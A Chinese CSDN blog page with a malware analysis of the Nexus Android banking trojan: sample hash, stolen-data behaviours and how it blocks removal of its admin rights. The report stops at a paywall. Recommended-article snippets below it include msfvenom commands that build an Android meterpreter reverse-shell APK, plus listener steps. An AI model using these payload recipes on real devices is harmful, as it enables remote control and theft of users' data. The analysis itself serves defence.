Nexus安卓木马分析报告

最新推荐文章于 2024-09-10 17:23:25 发布
最新推荐文章于 2024-09-10 17:23:25 发布
阅读量650 收藏 1
点赞数
文章标签: android 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zorelworld/article/details/130028896
版权
2023年3月,链安与中睿天下合作的监控系统检测到一种名为Nexus的安卓木马,它是原网银盗号木马SOVA的变种。该恶意软件能删除应用、隐藏图标、获取设备管理员权限,以及窃取短信、联系人、数字钱包信息等敏感数据。通过辅助功能,Nexus能自动开启并滥用权限,用户需警惕此类应用。
摘要由CSDN通过智能技术生成

概述

2023年3月21日晚上,链安与中睿天下联合研发的监控系统检测到一种新型安卓木马。在经过睿士沙箱系统捕获样本之后,发现该安卓木马极有可能是原安卓网银盗号木马SOVA的变种。与此同时,意大利安全公司Cleafy发布了一篇题为《Nexus:一个新的安卓僵尸网络?》的报告,确认该病毒确实是SOVA的变种,并将其重新命名为Nexus。

样本分析

• 样本名称:Chrome.apk

• 样本SHA256为:376d13affcbfc5d5358d39aba16b814f711f2e81632059a4bce5af060e038ea4

• 样本文件大小:4792032KB

主要行为列表

• 删除指定应用以其应用数据

• 安装并启动任意应用

• 隐藏自身应用图标

• 卸载保护

• 上传用户短信数据以及通讯录

• 使用SmsManager发送短信、 删除短信、取消短信通知

• 拨打电话

• 获取用户cookie信息并上传,注入cookie等

• 读取并上传数字钱包信息

• 记录并上传键盘输入记录

• 查询敏感信息手机数据(查询存储邮件、应用账号数据、IMSI等手机信息)

• 设置静音

• 屏幕解锁

• 访问指定Url

• 试图禁用管理员用户

• 开启辅助功能

• 监听手机重启事件

• 使用DownloadManager下载文件

安装测试

当木马安装完成后,手机主界面会出现一个类似Chrome浏览器的图标,与真实的Chrome图标略有差异。木马使用的图标较小,但在没有相关对比的情况下,基本上很难识别出这种差异。

当木马启动后,界面会提示用户需要开启“无障碍功能”。在用户点击界面任意位置时,将自动跳转到系统内的“无障碍功能”设置并自动启用该功能。

在启动“无障碍功能”之后,程序会自动弹出并请求获取“设备管理员权限”。

在恶意应用获得设备管理员权限后,它会在后台不断收集用户信息,用户很难察觉其存在。一旦设备管理员权限被授予,用户在尝试打开设备管理员权限设置界面时会发现界面迅速关闭,无法撤销权限。类似地,通过adb执行操作时也会遇到相同问题,界面会立刻关闭。这是因为恶意应用程序已经监控了设备管理员设置界面的开启动作,从而阻止用户撤销其权限。因此,用户需要启用root权限才能成功卸载此恶意应用。

Bash
adb shell am start -S "com.android.settings/.Settings\$DeviceAdminSettingsActivity"

样本深度分析

01

基础信息

最低0.47元/天 解锁文章
zorelworld
关注
浅谈Android手机木马手工查杀
weixin_30528371的博客
07-30 1849
这篇文章主要是浅谈,所以会从简单方面开始讲起。   关于手机木马查杀,有些人会说安装手机杀毒软件不就解决了吗? 其实不然。因为手机和PC不一样,手机反木马技术没有PC端那么强。   就算你把目前市面上的所有手机杀毒软件都安装到手机里,也不一定查杀出来。   下面就开始正式讲解手工查杀的方法。   第一种方法:用Android Debug Bridge(简称adb)调试工...
AhMyth (Android安卓木马渗透-详细教学)
m0_73135216的博客
05-13 2914
AhMyth安卓木马渗透测试
手机远控apk木马/安卓远程木马-零开始网安知识点
2401_84915584的博客
06-17 724
毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,
Android手机会中电脑病毒么,安卓手机中木马病毒怎么办
weixin_30836221的博客
05-26 1809
安卓手机是大众手机,国内小伙伴们使用最多的也就是安卓手机,安卓手机中木马病毒怎么办?很多网友都会有这样的疑问。今天佰佰安全网来给大家出出招吧。1,一般来说,对于手机顽固木马是非常难以清理的,一般即使恢复出厂设置都不能解决,遇到这情况,我们必须给手机进行双清,先把手机连接到电脑上,然后打开USB调试。2,在电脑上面下载一个刷机精灵或者是其他的刷机软件,然后打开工具箱,找到刷入【recovery】这个...
MSF初体验—入侵安卓手机
热门推荐
Banyan的博客
03-12 3万+
参考文章:http://www.cnblogs.com/hkleak/p/4852057.html 环境: windows8.1(装有pentestbox) IP:192.168.43.17 安卓手机一部(谷歌四儿子,安卓4.4.4)IP:192.168.43.152 在windwos控制台窗口用ipconfig查看本机IP 下面在启动pentestbox,因为我
XELF病毒分析-秘密花园
进击的星空
04-14 2369
秘密花园 概述母包结构 当我们拿到样本的时候查看内部的代码结构,可以判定这里面被里面插入广告sdk和几个莫名其妙的so以及一些加密的文件,当然我们首先就是需要了解每个文件都是用来干嘛,哪些代码块是恶意插入需要我们重点分析的,还有apk内携带的so文件以及其他文件是用来做什么的都是需要我们能结合apk本身一步步动静结合的去分析。     样本的主要行为,通过我们沙箱日志分析发现,样本主要是通过
android接收arduino字符串,【教程】Android手机通过OTG线连接Arduino,读写串口数据...
weixin_34553907的博客
05-25 1146
因为自己对电子电路是半桶水,复杂的单片机电路把我难倒了,幸好Arduino的出现,让一切都简化了不少。平时和朋友们就喜欢制作一些Arduino的小玩意儿来帮助生活和工作。因为朋友单位需要采购一些数据采集和云台控制的设备,就定制了些,全是用UNO和Arduino Nano来做的。但是这些设备所在的位置很分散,在城市的周边地区(非常的偏远,甚至是人迹罕见的地方,那是爬山涉水翻山越岭啊)。而数据采集的调...
Trustlook安全卫士 v2.4.5
01-12
Trustlook安全卫士(杀毒) - 保护你的android安卓或平板电脑免受病毒,利用其专有的下一代移动安全解决方案,完美查杀移动病毒和木马。 产品特点 ==== ✔极速的连续病毒扫描引擎 ✔对设备的性能提升任务管理器,...
基于GAN的Android恶意软件修改引擎
软件X 18(2022)100977原始软件出版物GANG-MAM:基于GAN的Android恶意软件修改引擎伦吉斯湾a,Sonia Laudanna,b,Shanxi,Aji S.a,Corrado Aaron Visaggiob,Vinod P.Ca印度喀拉拉邦特里凡得琅喀拉拉大学计算机...
kali安卓手机木马远控
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
msf安卓手机木马实战要点整理
Vdieoo的博客
04-07 5594
Msf手机木马高级选项设置说明 Androidwakelock 阻止手机休眠以便处理耗时操作 AutoUnhookProcess ? AutoVerifySession 自动验证删除无效会话 AutoVerifySessionTimeout 超时期间等待会话验证发生在几秒钟内 EnableStageEncoding 对第二级有效载荷进行编码 Sessi...
手机android.sys木马,使用kali生成木马入侵安卓手机
weixin_42353186的博客
05-29 6832
大家好,我是T0reAd今天给大家带来的是使用kali生成行动开始先查看kali的ip,我的是1.114然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk5555是设置的端口,可以自己更改显示这个说明已经生成成功了然后启动msf:msfconsol...
木马渗透安卓系统实验
polaris___的博客
05-30 4480
1.实验内容 Metasploit后门攻击实现远程控制Android手机 2.实验环境 设备 IP 子网掩码 Kali Linux(Hack) 222.20.78.6 255.255.248.0 Android(靶机) 10.11.6...
Kali环境使用Metasploit生成木马入侵安卓手机
zhaghailiangji的博客
02-27 2万+
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。环境准备:Kali2.0(msfVENOM、metasploit)安卓手机或安卓模拟器利用过程:先查看本地IP...
简单的安卓木马制作(实现外网控制)
Reaches_r的博客
08-05 1万+
前言: 要实现外网控制肯定需要一个外网的IP负责监听,没有的小伙伴推荐使用https://www.ngrok.cc。 其端口映射功能十分好用。具体使用教程见其官网。 注:如攻击机为虚拟机,最好在桥接模式 1.隧道协议TCP,设置好远程端口和本地端口 2.复制隧道ID,在kali里启动终端 3.启动成功,复制域名、端口 4.生成木马 5.获得控制权 6.下个照片看看 7.还能拍照(不过要权限),help命令可以查看所有功能,不一一赘述 ...
Android Radio2.0——公告监听设置(四)
最新发布
小旭的专栏
09-10 528
上一篇文章我们介绍了广播公告的注册及监听设置,这里我们来看一下广播公告添加监听的调用流程。
新型Dark Nexus IoT僵尸网络威胁报告
"Bitdefender的安全分析报告详细介绍了名为'Dark Nexus'的新型物联网(IoT)僵尸网络,该僵尸网络具有创新的功能和能力,使其在同类恶意软件中脱颖而出。报告由Bitdefender的研究和取证部门编写,深入探讨了Dark Nexus...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值